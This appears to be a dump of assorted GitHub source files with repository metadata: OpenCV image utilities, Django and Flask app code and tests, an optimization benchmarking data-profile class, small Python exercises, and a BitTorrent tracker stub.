ddepth, 1, 0, scale=scale, delta=delta, borderType=cv2.BORDER_DEFAULT)\n if fy is None:\n grad_y = cv2.Scharr(gray, ddepth, 0, 1, scale=scale, delta=delta, borderType=cv2.BORDER_DEFAULT)\n else:\n grad_y = cv2.Scharr(fy, ddepth, 0, 1, scale=scale, delta=delta, borderType=cv2.BORDER_DEFAULT)\n\n dtype = grad_x.dtype\n grad_x = np.floor_divide(grad_x, 32, grad_x) # (grad_x / 32).astype(dtype)\n grad_y = np.floor_divide(grad_y, 32, grad_y) # (grad_y / 32).astype(dtype)\n grad = np.sqrt(grad_x ** 2 + grad_y ** 2).astype(dtype) if gray is not None else None\n gc.collect()\n return grad, grad_x, grad_y\n\n raise NotImplementedError\n\n grad_x = cv2.Sobel(gray, ddepth, 1, 0, ksize=3, scale=scale, delta=delta, borderType=cv2.BORDER_DEFAULT)\n grad_y = cv2.Sobel(gray, ddepth, 0, 1, ksize=3, scale=scale, delta=delta, borderType=cv2.BORDER_DEFAULT)\n\n # Because Sobel uses kernel with sum of weights 2*4.\n # So result should be divided by 8\n grad_x /= 8.0\n grad_y /= 8.0\n grad = np.sqrt(grad_x**2 + grad_y**2)\n return grad, grad_x, grad_y\n\n\n# helper function for data visualization\ndef denormalize(x):\n \"\"\"Scale image to range 0..1 for correct plot\"\"\"\n x_max = np.percentile(x, 98)\n x_min = np.percentile(x, 2)\n x = (x - x_min) / (x_max - x_min)\n x = x.clip(0, 1)\n return x\n\n\ndef visualize(title, img_fname, **images):\n \"\"\"PLot images in one row.\"\"\"\n img_filtered = {key: value for (key, value) in images.items() if value is not None}\n n = len(img_filtered)\n fig = plt.figure(figsize=(16, 16))\n for i, (name, img) in enumerate(img_filtered.items()):\n plt.subplot(1, n, i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.title(' '.join(name.split('_')).title())\n plt.imshow(img)\n if title is not None:\n fig.suptitle(title, fontsize=16)\n if img_fname is not None:\n plt.savefig(img_fname)\n else:\n plt.show()\n plt.close(fig)\n\n\ndef get_contours(mask_u8cn, find_alg=cv2.CHAIN_APPROX_SIMPLE, find_mode=cv2.RETR_EXTERNAL, inverse_mask=False):\n if len(mask_u8cn.shape) < 3:\n mask_u8cn = mask_u8cn[..., np.newaxis]\n if inverse_mask:\n mask_u8cn = 255 - mask_u8cn\n\n class_nb = max(1, mask_u8cn.shape[2] - 1)\n contours_list = list()\n\n # Collect contours except background\n for i in range(class_nb):\n ret, thresh = cv2.threshold(mask_u8cn[..., i], 127, 255, cv2.THRESH_BINARY)\n\n if cv2.__version__.startswith(\"3\"):\n im, contours, hierarchy = cv2.findContours(thresh, find_mode, find_alg)\n else:\n contours, hierarchy = cv2.findContours(thresh, find_mode, find_alg)\n\n if find_mode == cv2.RETR_TREE:\n #\n # To describe relation in hierarchy with type cv2.RETR_TREE\n # hierarchy[0][i] = [next sibling, prev sibling, child, parent]\n #\n \"\"\"\n grand = [contours[i] for i in range(len(contours)) if\n hierarchy[0][i][2] >= 0 and hierarchy[0][i][3] < 0] # NO parents HAVE children\n logging.info('len(grand): {}'.format(len(grand)))\n holes = [contours[i] for i in range(len(contours)) if\n hierarchy[0][i][2] < 0 and hierarchy[0][i][3] >= 0] # HAVE parents NO children\n logging.info('len(holes): {}'.format(len(holes)))\n ones = [contours[i] for i in range(len(contours)) if\n hierarchy[0][i][2] < 0 and hierarchy[0][i][3] < 0] # NO parents NO children\n logging.info('len(ones): {}'.format(len(ones)))\n siblings = [contours[i] for i in range(len(contours)) if\n hierarchy[0][i][2] < 0 and hierarchy[0][i][3] >= 0 and\n (hierarchy[0][i][0] >= 0 or hierarchy[0][i][1] >= 0) ] # HAVE parents NO childs HAVE SIBLINGS\n logging.info('len(siblings): {}'.format(len(siblings)))\n \"\"\"\n # Pay attention - if objects are black which put on white background -\n # each objects will be a child, and main parent - image rectangle\n c1 = [contours[i] for i in range(len(contours)) if\n hierarchy[0][i][2] < 0 and hierarchy[0][i][3] >= 0] # HAVE parents NO children\n # Collect objects which are not main parent(image rect) i.e. HAVE parents and HAVE children -\n # it could be big objects, on which the objects are smaller\n c2 = [contours[i] for i in range(len(contours)) if\n hierarchy[0][i][2] >= 0 and hierarchy[0][i][3] >= 0] # HAVE parents HAVE children\n contours = c1 + c2\n\n # Filter out non-manifold contours\n contours = list(filter(lambda x: len(x) > 2, contours))\n\n contours_list.append(contours)\n\n return contours_list\n\n\ndef write_text(img_rgb, text, bottom_left_corner_of_text, fontColor, font_scale=1):\n font = cv2.FONT_HERSHEY_SIMPLEX\n line_type = 2\n\n cv2.putText(img_rgb, text,\n bottom_left_corner_of_text,\n font,\n font_scale,\n (0, 0, 0),\n thickness=4,\n lineType=line_type)\n\n cv2.putText(img_rgb, text,\n bottom_left_corner_of_text,\n font,\n font_scale,\n fontColor,\n thickness=1,\n lineType=line_type)\n","repo_name":"oradzhabov/bigimage","sub_path":"kutils/utilites.py","file_name":"utilites.py","file_ext":"py","file_size_in_byte":7201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4725987268","text":"#lambda\n(lambda a,b : print(a+b))(1,2)\n\nsuma = lambda a,b : print(a+b)\nsuma(1,2)\n\n(lambda *n : print(sum(n)))(*list(range(1,101,1)))\n\ndef multiplicador(n):\n return lambda a:print(a*n);\n\nduplicador = multiplicador(2);\ntriplicador = multiplicador(3);\nduplicador(11)\ntriplicador(10)\n\n#input\n# x = int(input(\"fsdfksdf\"));\n\n#trycatch\ntry :\n print(1/0)\nexcept Exception as s:\n print(\"Error\", s)\nelse :\n print(\"Sin fallas\")\nfinally :\n print(\"A fuerzitas\")\n\n\n#assert\ndef suma(a,b):\n try:\n assert(type(a) == int)\n assert(type(b) == int)\n except AssertionError :\n print(\"Tipo de dato invalido\")\n else:\n print(a+b)\n\nsuma(2,\"D\")\nsuma(2,2)","repo_name":"AeaX2311/PracticasPython","sub_path":"Unidad 1/Lambda - input - assert - try.py","file_name":"Lambda - input - assert - try.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33347926213","text":"from django.test import TestCase\nfrom django.urls import resolve\nfrom note.views import home_page\nfrom note.models import Name,Item\nclass liveViewTest(TestCase):\n def test_first_returns_correct_html(self):#测试首页模板\n respose = self.client.get('/')\n self.assertTemplateUsed(respose, 'home.html') # 检测响应是用哪个模板渲染的\n\n def test_can_Skip_a_POST_request(self): # 测试首页post请求响应是否跳转到相应界面\n response = self.client.post('/', data={'name_text': 'cmy'})\n self.assertRedirects(response, '/note/cmy') # 测试重定向\n\n def test_can_saved_first_post(self):#测试首页填的数据是否正确填入数据库\n response = self.client.post('/', data={'name_text': 'cmy'})\n new_name=Name.objects.first()\n self.assertEqual(new_name.name,'cmy')\n response = self.client.post('/', data={'name_text': 'cmy'})#测试输入同样的名字会不会保存到数据库\n name_list=Name.objects.all()\n self.assertEqual(name_list.count(),1)\n\n def test_note_returns_correct_html(self):#测试note模板\n Name.objects.create(name='cmy')\n respose = self.client.get('/note/cmy')\n self.assertTemplateUsed(respose, 'node.html') # 检测响应是用哪个模板渲染的\n\n def test_second_returns_correct_html(self): # 测试url参数是否传入视图模板,以及正确反应\n Name.objects.create(name='cmy')\n respose = self.client.get('/note/cmy')#访问创建好名字的node模板\n self.assertIn('cmy', respose.content.decode())\n respose = self.client.get('/note/cmy1') # 访问没有创建好名字的node模板\n self.assertNotIn('cmy1', respose.content.decode())\n self.assertRedirects(respose, '/')\n\n def test_second_saved_post(self):#测试note页端的存储情况\n Name.objects.create(name='cmy')\n response = self.client.post('/note/cmy', data={'list_text': 'test1'})\n self.assertEqual(Item.objects.count(), 1) # 测试在前端填写的有没有正确的填入数据库\n new_item = Item.objects.first()\n self.assertEqual('test1', new_item.text)\n\n def test_Item_display_correct(self):#测试访问item是否正常显示\n Name.objects.create(name='cmy')\n respose = self.client.get('/note/cmy')#没有存储事例前访问\n self.assertNotIn('1:test1', respose.content.decode())\n response = self.client.post('/note/cmy', data={'list_text': 'test1'})\n self.assertIn('1:test1', response.content.decode())#存储完,POST请求\n respose = self.client.get('/note/cmy')#存储完 GET请求\n self.assertIn('1:test1', respose.content.decode())\n\n class TestModel(TestCase): # 测试数据库\n def test_saving_and_retrieving_items(self): # 测试数据库是否正常存储\n input_name='cmy'\n saved_Name = Name.objects.create(name=input_name)\n Item.objects.create(name=saved_Name,text='test1')\n Item.objects.create(name=saved_Name, text='test2')\n item=saved_Name.item_set.all\n first_saved=item[0]\n second_saved=item[2]\n self.assertEqual(first_saved.text, 'test1') # 测试Item保存数据是否成功\n self.assertEqual(second_saved.text, 'test2')\n saved_Name_list = Name.objects.first()#测试Name表第一个保存的数据是否成功\n self.assertEqual(saved_Name, saved_Name_list)\n# Create your tests here.\n","repo_name":"smartfish007/githubtest","sub_path":"NotePad/note/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39911138784","text":"from flask import request, jsonify, abort\nfrom opencampus.common import modulemanager\nfrom opencampus.common.models import Campus\nfrom opencampus.module.account.models import Account\n\n\n@modulemanager.api_route('account', '/v1/accounts/me')\ndef account_me_info():\n if not request.access_token or request.access_token.access_obj_type != 'account':\n return jsonify({'error': {'code': 'not_found_account_access_token'}}), 403\n\n try:\n account = Account.objects(id=request.access_token.access_obj_id).id()\n except Account.DoesNotExist:\n return jsonify({'error': {'code': 'not_found_account'}}), 404\n\n info = {\n }\n\n if 'get_account' in request.access_token.scope:\n campus = Campus.objects(id=account.campus_id).get()\n info.update({\n 'id': str(account.id),\n 'campus': {\n 'id': account.campus_id,\n 'univ_name': campus.univ_name,\n 'univ_type': campus.univ_type,\n 'campus_name': campus.campus_name\n }\n })\n\n if 'get_student_id' in request.access_token.scope:\n info.update({\n 'student_id': account.student_id\n })\n\n return jsonify(info)\n\n\n@modulemanager.api_route('account', '/v1/accounts/me/grade')\ndef account_me_grade():\n if not request.access_token or request.access_token.access_obj_type != 'account':\n return jsonify({'error': {'code': 'not_found_account_access_token'}}), 403\n\n try:\n account = Account.objects(id=request.access_token.access_obj_id).get()\n except Account.DoesNotExist:\n return jsonify({'error': {'code': 'not_found_account'}}), 404\n\n if 'get_grade' not in request.access_token.scope:\n return jsonify({'error': {'code': 'error_scope'}}), 403\n\n campus = Campus.objects(id=account.campus_id).get()\n\n return jsonify({\n 'data': campus.get_gateway().get_student_grade(account)\n })\n\n\n@modulemanager.api_route('account', '/v1/account/change_campus_data', methods=['PUT'])\ndef account_change_auth_info():\n request_data = request.get_json()\n campus_id = request_data.get('campus_id')\n student_id = request_data.get('student_id')\n\n try:\n request.campus = Campus.objects(id=campus_id).get()\n except Campus.DoesNotExist:\n return jsonify({'error': {'code': 'not_found_campus'}}), 400\n\n @modulemanager.gateway_only\n def change_auth_info():\n try:\n account = Account.objects(campus_id=campus_id, student_id=student_id).get()\n except Account.DoesNotExist:\n return jsonify({'error': {'code': 'not_found_account'}}), 404\n\n if 'auth_info' in request_data:\n account.auth_info = request_data.get('auth_info')\n if 'name' in request_data:\n account.name = request_data.get('name')\n if 'departments' in request_data:\n account.departments = request_data.get('departments')\n account.save()\n return jsonify({'state': 'ok'})\n\n return change_auth_info()\n","repo_name":"shlee322/opencampus","sub_path":"opencampus/module/account/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"7599472106","text":"from typing import List, Callable\nimport math\nimport time\n\n\ndef naive_trial_factorisation(n: int) -> List[int]:\n '''\n Tests all i from 2 to n.\n If i divides n, then i is a factor, continue algorithm with n/i.\n Repeat until n is fully factorised.\n '''\n\n factors = [1]\n\n completely_factored = False\n while not completely_factored:\n for i in range(2, math.floor(math.sqrt(n)) + 1):\n if n % i == 0:\n factors.append(i)\n n = int(n / i)\n break\n else:\n factors.append(n)\n completely_factored = True\n\n return factors\n\n\ndef fermat_factorisation(n: int) -> (int, int):\n '''\n Tests all t from sqrt(n) to n.\n If s^2 = t^2 - n is a square, then return n = ab = (t + s)(t - s).\n '''\n\n if n % 2 == 0:\n return (int(n / 2), 2)\n\n for t in range(math.ceil(math.sqrt(n)), n + 1):\n s_squared = t ** 2 - n\n s = math.sqrt(s_squared)\n\n if int(s) == math.sqrt(s_squared):\n return [int(s + t), int(t - s)]\n\n\ndef fully_factorise(n: int, f: Callable) -> (int, int):\n ''' \n Given a factorisation function that ouputs 2 factors,\n this function will recursively factor\n until we reach have reached prime factorisation.\n '''\n\n if n == 1:\n return [1]\n else:\n num0, num1 = f(n)\n if num0 == n or num1 == n:\n return [n]\n else:\n return fully_factorise(num0, f) + fully_factorise(num1, f)\n\n\nif __name__ == \"__main__\":\n start = time.time()\n print(naive_trial_factorisation(1373 * 1291 * 1223))\n end = time.time()\n print(f\"Time taken for trial factorisation: {round(end - start, 5)}\")\n\n start = time.time()\n print(fermat_factorisation(1373 * 1291 * 1223))\n end = time.time()\n print(f\"Time taken for 2-Fermat factorisation: {round(end - start, 5)}\")\n\n start = time.time()\n print(fully_factorise(1373 * 1291 * 1223, fermat_factorisation))\n end = time.time()\n print(f\"Time taken for full-Fermat factorisation: {round(end - start, 5)}\")\n","repo_name":"V-Wong/MATH3411","sub_path":"factorisation_methods.py","file_name":"factorisation_methods.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"478337323","text":"from __future__ import annotations\n\nfrom collections.abc import Iterable\nfrom collections.abc import Mapping\nfrom collections.abc import Sequence\nfrom typing import TYPE_CHECKING\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom gemseo.utils.matplotlib_figure import save_show_figure\nfrom numpy import array\nfrom numpy import linspace\nfrom numpy import ndarray\nfrom numpy import zeros\n\nfrom gemseo_benchmark import COLORS_CYCLE\nfrom gemseo_benchmark import MarkeveryType\nfrom gemseo_benchmark import get_markers_cycle\nfrom gemseo_benchmark.results.performance_history import PerformanceHistory\n\nif TYPE_CHECKING:\n from numbers import Number\n from pathlib import Path\n\n from matplotlib.figure import Figure\n\n from gemseo_benchmark.data_profiles.target_values import TargetValues\n\n\nclass DataProfile:\n \"\"\"Data profile that compares iterative algorithms on reference problems.\n\n A data profile is an empirical cumulative distribution function of the number of\n problems functions evaluations required by an algorithm to reach a reference problem\n target.\n \"\"\"\n\n def __init__(self, target_values: Mapping[str, TargetValues]) -> None:\n \"\"\"\n Args:\n target_values: The target values of each of the reference problems.\n \"\"\" # noqa: D205, D212, D415\n self.__targets_number = 0\n self.target_values = target_values\n self.__values_histories = {}\n\n @property\n def target_values(self) -> dict[str, TargetValues]:\n \"\"\"The target values of each reference problem.\n\n Target values are a scale of objective function values,\n ranging from an easily achievable one to the best known value.\n A data profile is computed by counting the number of targets reached by an\n algorithm at each iteration.\n\n Raises:\n TypeError: if the target values are not passed as a dictionary.\n ValueError: If the reference problems have different numbers of target\n values.\n \"\"\"\n return self.__target_values\n\n @target_values.setter\n def target_values(self, target_values: Mapping[str, TargetValues]) -> None:\n if not isinstance(target_values, Mapping):\n raise TypeError(\"The target values be must passed as a mapping\")\n\n targets_numbers = {len(pb_targets) for pb_targets in target_values.values()}\n if len(targets_numbers) != 1:\n raise ValueError(\n \"The reference problems must have the same number of target values.\"\n )\n\n self.__target_values = dict(target_values)\n self.__targets_number = targets_numbers.pop()\n\n def add_history(\n self,\n problem_name: str,\n algorithm_configuration_name: str,\n objective_values: Sequence[float],\n infeasibility_measures: Sequence[float] | None = None,\n feasibility_statuses: Sequence[bool] | None = None,\n ) -> None:\n \"\"\"Add a history of performance values.\n\n Args:\n problem_name: The name of the problem.\n algorithm_configuration_name: The name of the algorithm configuration.\n objective_values: A history of objective values.\n N.B. the value at index ``i`` is assumed to have been obtained with\n ``i+1`` evaluations.\n infeasibility_measures: A history of infeasibility measures.\n If ``None`` then measures are set to zero in case of feasibility and set\n to infinity otherwise.\n feasibility_statuses: A history of (boolean) feasibility statuses.\n If ``None`` then feasibility is always assumed.\n\n Raises:\n ValueError: If the problem name is not the name of a reference problem.\n \"\"\"\n if problem_name not in self.__target_values:\n raise ValueError(f\"{problem_name!r} is not the name of a reference problem\")\n if algorithm_configuration_name not in self.__values_histories:\n self.__values_histories[algorithm_configuration_name] = {\n pb_name: [] for pb_name in self.__target_values\n }\n history = PerformanceHistory(\n objective_values, infeasibility_measures, feasibility_statuses\n )\n self.__values_histories[algorithm_configuration_name][problem_name].append(\n history\n )\n\n def plot(\n self,\n algo_names: Iterable[str] | None = None,\n show: bool = True,\n file_path: str | Path | None = None,\n markevery: MarkeveryType = 0.1,\n ) -> None:\n \"\"\"Plot the data profiles of the required algorithms.\n\n Args:\n algo_names: The names of the algorithms.\n If ``None`` then all the algorithms are considered.\n show: If True, show the plot.\n file_path: The path where to save the plot.\n If ``None``, the plot is not saved.\n markevery: The sampling parameter for the markers of the plot.\n Refer to the Matplotlib documentation.\n \"\"\"\n if algo_names is None:\n algo_names = ()\n\n data_profiles = self.compute_data_profiles(*algo_names)\n figure = self._plot_data_profiles(data_profiles, markevery)\n save_show_figure(figure, show, file_path)\n\n def compute_data_profiles(self, *algo_names: str) -> dict[str, list[Number]]:\n \"\"\"Compute the data profiles of the required algorithms.\n\n For each algorithm, compute the cumulative distribution function of the number\n of evaluations required by the algorithm to reach a reference target.\n\n Args:\n algo_names: The names of the algorithms.\n If ``None`` then all the algorithms are considered.\n\n Returns:\n The data profiles.\n \"\"\"\n data_profiles = {}\n if not algo_names:\n algo_names = self.__values_histories.keys()\n\n for name in algo_names:\n total_hits_history = self.__compute_hits_history(name)\n problems_number = len(self.__target_values)\n repeat_number = self.__get_repeat_number(name)\n targets_total = self.__targets_number * problems_number * repeat_number\n ratios = total_hits_history / targets_total\n data_profiles[name] = ratios.tolist()\n return data_profiles\n\n def __compute_hits_history(self, algo_name: str) -> ndarray:\n \"\"\"Compute the history of the number of target hits of an algorithm.\n\n Args:\n algo_name: The name of the algorithm.\n\n Returns:\n The history of the number of target hits.\n \"\"\"\n algo_histories = self.__values_histories[algo_name]\n\n # Compute the maximal size of an optimization history\n max_history_size = max([\n max([len(pb_history) for pb_history in algo_history])\n for algo_history in algo_histories.values()\n ])\n\n # Compute the history of the number of target hits across all optimizations\n total_hits_history = zeros(max_history_size)\n for pb_name, targets in self.__target_values.items():\n for pb_history in algo_histories[pb_name]:\n hits_history = targets.compute_target_hits_history(pb_history)\n # If the history is shorter than the longest one, repeat its last value\n if len(hits_history) < max_history_size:\n tail = [hits_history[-1]] * (max_history_size - len(hits_history))\n hits_history.extend(tail)\n\n total_hits_history += array(hits_history)\n\n return total_hits_history\n\n def __get_repeat_number(self, algo_name: str) -> int:\n \"\"\"Check that an algorithm has the same number of histories for each problem.\n\n Make sure that the reference problems are equally represented with respect to\n the algorithm performance.\n\n Args:\n algo_name: The name of the algorithm.\n\n Returns:\n The common number of values histories per problem.\n\n Raises:\n ValueError: If the algorithm does not have the same number of histories\n for each problem.\n \"\"\"\n histories_numbers = {\n len(histories) for histories in self.__values_histories[algo_name].values()\n }\n if len(histories_numbers) != 1:\n raise ValueError(\n f\"Reference problems unequally represented for algorithm {algo_name!r}.\"\n )\n return histories_numbers.pop()\n\n @staticmethod\n def _plot_data_profiles(\n data_profiles: Mapping[str, Sequence[Number]], markevery: MarkeveryType = 0.1\n ) -> Figure:\n \"\"\"Plot the data profiles.\n\n Args:\n data_profiles: The data profiles.\n markevery: The sampling parameter for the markers of the plot.\n Refer to the Matplotlib documentation.\n\n Returns:\n The data profiles figure.\n \"\"\"\n fig = plt.figure()\n axes = fig.add_subplot(1, 1, 1)\n\n # Set the title and axes\n axes.set_title(f\"Data profile{'s' if len(data_profiles) > 1 else ''}\")\n max_profile_size = max([len(profile) for profile in data_profiles.values()])\n axes.xaxis.set_major_locator(matplotlib.ticker.MaxNLocator(integer=True))\n plt.xlabel(\"Number of functions evaluations\")\n plt.xlim([1, max_profile_size])\n y_ticks = linspace(0.0, 1.0, 11)\n plt.yticks(y_ticks, (f\"{ratio * 100.0:02.0f}%\" for ratio in y_ticks))\n plt.ylabel(\"Ratios of targets reached\")\n plt.ylim([0.0, 1.05])\n\n # Plot the 100% line\n axes.axhline(1.0, linestyle=\":\", color=\"black\")\n\n # Plot the data profiles\n for color, marker, (name, profile) in zip(\n COLORS_CYCLE, get_markers_cycle(), data_profiles.items()\n ):\n # Plot the data profile\n profile_size = len(profile)\n axes.plot(\n range(1, profile_size + 1),\n profile,\n color=color,\n label=name,\n marker=marker,\n markevery=markevery,\n )\n\n # Extend the profile with an horizontal line if necessary\n if profile_size < max_profile_size:\n tail_size = max_profile_size - profile_size + 1\n last_value = profile[-1]\n axes.plot(\n range(profile_size, profile_size + tail_size),\n [last_value] * tail_size,\n color=color,\n linestyle=\"dotted\",\n )\n # Mark the last entry of the data profile\n axes.plot(profile_size, last_value, marker=\"*\", color=color)\n plt.legend()\n\n return fig\n","repo_name":"gemseo/gemseo-benchmark","sub_path":"src/gemseo_benchmark/data_profiles/data_profile.py","file_name":"data_profile.py","file_ext":"py","file_size_in_byte":10822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2128036317","text":"arr =[input().split() for _ in range(5)]\n\nres = []\ndef first(arr):\n arr = sorted(arr, key=lambda x: x[1])\n for i in range(len(arr)-1):\n if arr[i][0] != arr[i+1][0] or (arr[i][1])+1 != arr[i+1][1]:\n return 0\n return sorted(arr, key=lambda x: x[1], reverse= True)[0][1]+900\n\ndef sec_thr_six_sev_eig(arr):\n tmp = [str(i[1])for i in arr] # 1 1 1 1 2\n count = 0\n if len(set(tmp)) == 2:\n for i in set(tmp):\n c = [''.join(tmp).count(i), i]\n if c[0]== 1:\n pass\n elif c[0] == 4:\n return 800+ int(c[1])\n elif c[0] == 3:\n count += (int(c[1]) * 10)\n else:\n count += int(c[1])+700\n return count if count != 0 else 0 \n elif len(set(tmp)) == 3:\n count=[]\n for i in set(tmp):\n c = [''.join(tmp).count(i), i]\n if c[0] == 3:\n return int(c[1]) + 400\n elif c[0] == 2:\n count.append(int(c[1]))\n return max(count)*10 + min(count)+300\n elif len(set(tmp)) ==4:\n for i in set(tmp):\n c = [''.join(tmp).count(i), i]\n if c[0] == 2:\n return int(c[1]) + 200\n return 0\n\ndef fourth(arr):\n tmp = [i[0] for i in arr]\n if len(set(tmp)) == 1:\n return sorted(arr, key=lambda x: x[1], reverse=True)[0][1] + 600\n return 0\n\ndef fifth(arr):\n arr = sorted(arr, key=lambda x: x[1])\n if all(arr[i][1]+1 ==arr[i+1][1] for i in range(len(arr)-1)):\n return arr[-1][1] + 500\n return 0\n\n\n\n\nfor i in arr:\n i[1] = int(i[1])\na = max(first(arr),sec_thr_six_sev_eig(arr), fourth(arr), fifth(arr))\nprint(sorted(arr, key=lambda x: x[1])[-1][1]+100 if a == 0 else a)\n \n# a = [1,2,2,2]\n# print([ str(i) for i in set(a)])\n# print(a)\n\n# 50\n# 702","repo_name":"jinn2u/algorithm","sub_path":"백준/구현/2621.py","file_name":"2621.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20213288428","text":"from abc import ABCMeta, abstractmethod\n\n\nclass Tracker(object):\n __metaclass__ = ABCMeta\n\n def __init__(self, url, port, torrent, peer_id):\n self.url = url\n self.port = port\n self.torrent = torrent\n self.peer_id = peer_id\n\n @abstractmethod\n def peers(self):\n raise NotImplemented(\"This method needs to be implemented\")\n","repo_name":"vtemian/university_projects","sub_path":"data_structures/bitorrent/client/trackers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30378058671","text":"import math\nimport config\n\ndef initialiseCrossings():\n for i in range(2*config.xsize+1):\n config.crossings.append([])\n for j in range(2*config.ysize+1):\n config.crossings[i].append(0)\n \n for i in range(2*config.ysize+1):\n config.crossings[config.xsize][i] = 8+4\n config.crossings[-config.xsize][i] = 2+1\n for i in range(2*config.xsize+1):\n config.crossings[i][config.ysize] = 8+2\n config.crossings[i][-config.ysize] = 4+1\n \ndef symmetriseWalls():\n a = set()\n for w in config.walls:\n a.add((w[0],-w[1],w[2]))\n a.add((-w[0],-w[1],w[2]))\n a.add((-w[0],w[1],w[2]))\n for b in a:\n config.walls.add(b)\n\ndef symmetriseIgnores():\n a = set()\n for i in config.ignoreCrossings:\n a.add((i[0],-i[1]))\n a.add((-i[0],-i[1]))\n a.add((-i[0],i[1]))\n for b in a:\n config.ignoreCrossings.add(b)\n\ndef nearCrossing(p):\n '''Are we plus or minus 1 from a crossing?'''\n x = p.x%(config.grid/2)\n y = p.y%(config.grid/2)\n if x == config.step or x == config.grid/2 - config.step or y == config.step or y == config.grid/2 - config.step:\n return True\n return False\n\ndef atCrossing(p):\n '''Are we at a crossing?'''\n x = p.x%(config.grid/2)\n y = p.y%(config.grid/2)\n if x == 0 or y == 0:\n return True\n return False\n \ndef getCrossing(p):\n '''Get the nearest half-grid coordinate.'''\n return int((p.x + config.grid/4)//(config.grid/2)), int((p.y + config.grid/4)//(config.grid/2))\n\ndef crossingType(p):\n '''Get the crossing type of the nearest half-grid coordinate.\n Returns 0 for a wall, 1 for main diagonal over, -1 for a under.'''\n w = getWall(p)\n if w:\n return 0\n gx,gy = getCrossing(p)\n if abs(gx) == config.xsize:\n return 0\n if abs(gy) == config.ysize:\n return 0\n if gx%2 == 1:\n return 1\n return -1\n\ndef getWall(p):\n '''Get the wall at the given crossing.'''\n gx,gy = getCrossing(p)\n if abs(gx) == config.xsize:\n # Vertical edge\n return [gx,gy,1]\n if abs(gy) == config.ysize:\n # Horizontal edge\n return [gx,gy,0]\n for w in config.walls:\n if gx == w[0] and gy == w[1]:\n return w\n return False\n\ndef newStrand():\n for i in range(len(config.crossings)):\n x = (i + config.xsize)%(2*config.xsize+1) - config.xsize\n for j in range(len(config.crossings[i])):\n y = (j + config.ysize)%(2*config.ysize+1) - config.ysize\n if (x + config.xsize + y + config.ysize)%2 == 1:\n if config.crossings[i][j] != 15 and not (x,y) in config.ignoreCrossings:\n p = PVector(x * config.grid/2, y * config.grid/2)\n a = config.crossings[i][j]\n if config.crossings[i][j] & 1 != 1:\n v = PVector(-5,-5)\n config.crossings[i][j] |= 1\n elif config.crossings[i][j] & 2 != 2:\n v = PVector(-5,5)\n config.crossings[i][j] |= 2\n elif config.crossings[i][j] & 4 != 4:\n v = PVector(5,-5)\n config.crossings[i][j] |= 4\n elif config.crossings[i][j] & 8 != 8:\n v = PVector(5,5)\n config.crossings[i][j] |= 8\n return p,v\n return False, False\n","repo_name":"loopspace/Processing-Celtic","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5622900587","text":"#imports necessary packages\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plot\n\n\n#_____________________beginning of user input______________________________\n#specify the folder containing ROC_data.csv and the desired name for the spreadsheet that is outputted\nPATH='/hard drive/experiment folder/'\nfile_input = PATH+'ROC_data.csv'\nfile_ouput = PATH+'ROC_table.csv'\n\n#Just include high confidence aggregates? select either 'yes' or 'no'\nhigh_con = 'no'\n#specify the upper bound of CV values to assess\nupper_bound = 2\n#specify the number of CV thresholds between 0 and the upper bound to test\nbreaks = 200\n#specify fluorescent channel\nchannel = 'Cy5'\n#specify timepoint\ntimepoint = 1\n#_____________________end of user input______________________________\n\n#imports ROC_data.csv\ndf = pd.read_csv(file_input)\n\n#counts the number of cells without aggregates\nno_agg_num = len(list(df['aggregate'][df['aggregate'] == 0]))\n#counts the number of cells with aggregates\naggs_num = len(list(df['aggregate'][df['aggregate'] > 0]))\n#counts the number of cells with high confidence aggregates\nhigh_con_aggs_num = len(list(df['aggregate'][df['aggregate'] == 2]))\n\n#creates a list of all CV threshold values\nthresh_list = [x*upper_bound/(breaks) for x in range(breaks)]\nthresh_list.append(upper_bound)\n\n#creates a new dataframe called df_ROC\ndf_ROC = pd.DataFrame()\n#adds the thresh_list as a column to df_ROC\ndf_ROC['threshold'] = thresh_list\n\n#creates subsetted dataframes containing either no aggregates, all aggregates, or high-confidence aggregates\ndf_no_agg = df[df['aggregate'] == 0]\ndf_agg = df[df['aggregate'] > 0]\ndf_high_con = df[df['aggregate'] == 2]\n\n#creates lists that count how many cells have a CV value below each threshold value\nno_aggs_list = [df_no_agg[channel+'-CV-'+str(timepoint)][df_no_agg[channel+'-CV-'+str(timepoint)] 100:\n miles = miles - 100\n amount = (60 * days_int) + ((0.25 * miles)*days_int)\n r_amount = round(amount,1)\n else:\n amount = (60 * days_int)\n r_amount = round(amount,1)\n print(\"Amount due: \",r_amount)\n # spyr aftur hvort vilji halda áfram svo while lykkjan verði ekki endalaus\n con = input(\"Would you like to continue (y/n)? \")\n","repo_name":"Yazminlilja/Vika3-forritun","sub_path":"Skilaverkefni/car_rental.py","file_name":"car_rental.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"is","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36896407365","text":"from nose.tools import eq_, ok_\n\nfrom canon_set import CanonicalSet\nfrom cyclic_cache import CyclicCacheFactory\n\nCACHE_SIZE = 4\n\nclass TestCanonicalSet(object):\n \"\"\"\n Test CanonicalSet. Currently hints are unsupported.\n 